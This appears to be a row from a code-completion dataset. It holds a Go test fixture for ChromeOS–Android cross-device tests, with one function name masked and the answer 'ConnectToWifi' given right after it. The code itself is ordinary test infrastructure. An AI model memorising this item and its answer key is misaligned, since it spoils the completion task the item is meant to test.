if f.logMarker != nil {
s.Log("A log marker is already created but not cleaned up")
}
logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
if err == nil {
f.logMarker = logMarker
} else {
s.Log("Failed to start the log saver: ", err)
}
timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
f.logcatStartTime = timestamp
if f.saveScreenRecording {
if f.kb == nil {
// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
kb, err := input.VirtualKeyboard(ctx)
if err != nil {
s.Fatal("Failed to setup keyboard for screen recording: ", err)
}
f.kb = kb
}
if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
s.Fatal("Failed to start screen recording on CrOS: ", err)
}
saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
if err != nil {
s.Fatal("Failed to start screen recording on Android: ", err)
}
f.saveAndroidScreenRecordingOnError = saveScreen
}
}
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
if err := f.btsnoopCmd.Kill(); err != nil {
s.Error("Failed to stop btsnoop log capture: ", err)
}
f.btsnoopCmd.Wait()
f.btsnoopCmd = nil
if f.logMarker != nil {
if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
s.Log("Failed to store per-test log data: ", err)
}
f.logMarker = nil
}
// Restore connection to the ADB-over-WiFi device if it was lost during the test.
// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
s.Log("Connection to ADB device lost, restaring")
device, err := AdbOverWifi(ctx)
if err != nil {
s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
}
f.androidDevice.Device = device
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
s.Fatal("Failed to reconnect to the snippet: ", err)
}
}
if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
s.Fatal("Failed to save logcat logs from the test: ", err)
}
if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
s.Fatal("Failed to save persistent logcat logs: ", err)
}
if f.saveScreenRecording {
if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
s.Fatal("Failed to save Android screen recording: ", err)
}
f.saveAndroidScreenRecordingOnError = nil
ui := uiauto.New(f.tconn)
var crosRecordErr error
if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil {
// Smart Lock tests automatically stop the screen recording when they lock the screen.
// The screen recording should still exist though.
crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
} else {
crosRecordErr = uiauto.StopRecordFromKBAndSaveOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
}
if crosRecordErr != nil {
s.Fatal("Failed to save CrOS screen recording: ", crosRecordErr)
}
}
if s.HasError() {
if err := BugReport(ctx, f.androidDevice.Device, s.OutDir()); err != nil {
s.Error("Failed to save Android bug report: ", err)
}
}
}
// Verify that pairing between Android and Chromebook is successful.
func (f *crossdeviceFixture) PairWithAndroid(ctx context.Context, tconn *chrome.TestConn, cr *chrome.Chrome) error {
if err := f.androidDevice.Pair(ctx); err != nil {
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
return errors.Wrap(err, "failed to reconnect to the snippet server")
}
if err := f.androidDevice.Pair(ctx); err != nil {
return errors.Wrap(err, "failed to connect the Android device to CrOS")
}
}
if err := crossdevicesettings.WaitForConnectedDevice(ctx, tconn, cr); err != nil {
return errors.Wrap(err, "failed waiting for the connected device to appear in OS settings")
}
return nil
}
// saveDeviceAttributes saves the CrOS and Android device attributes as a formatted JSON at the specified filepath.
func saveDeviceAttributes(crosAttrs *crossdevicecommon.CrosAttributes, androidAttrs *AndroidAttributes, filepath string) error {
attributes := struct {
CrOS *crossdevicecommon.CrosAttributes
Android *AndroidAttributes
}{CrOS: crosAttrs, Android: androidAttrs}
crosLog, err := json.MarshalIndent(attributes, "", "\t")
if err != nil {
return errors.Wrap(err, "failed to format device metadata for logging")
}
if err := ioutil.WriteFile(filepath, crosLog, 0644); err != nil {
return errors.Wrap(err, "failed to write CrOS attributes to output file")
}
return nil
}
// ConnectToWifi connects the chromebook to the Wifi network in its RF box.
func | (ctx context.Context) error {
if err := testing.Poll(ctx, func(ctx context.Context) error {
out, err := testexec.CommandContext(ctx, "/usr/local/autotest/cros/scripts/wifi", "connect", "nearbysharing_1", "password").CombinedOutput(testexec.DumpLogOnError)
if err != nil {
if strings.Contains(string(out), "already connected") {
testing.ContextLog(ctx, "Already connected to wifi network")
return nil
}
return errors.Wrap(err, "failed to connect CrOS device to Wifi")
}
return nil
}, &testing.PollOptions{Timeout: 20 * time.Second, Interval: 3 * time.Second}); err != nil {
return errors.Wrap(err, "failed to connect to wifi")
}
return nil
}
| ConnectToWifi | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.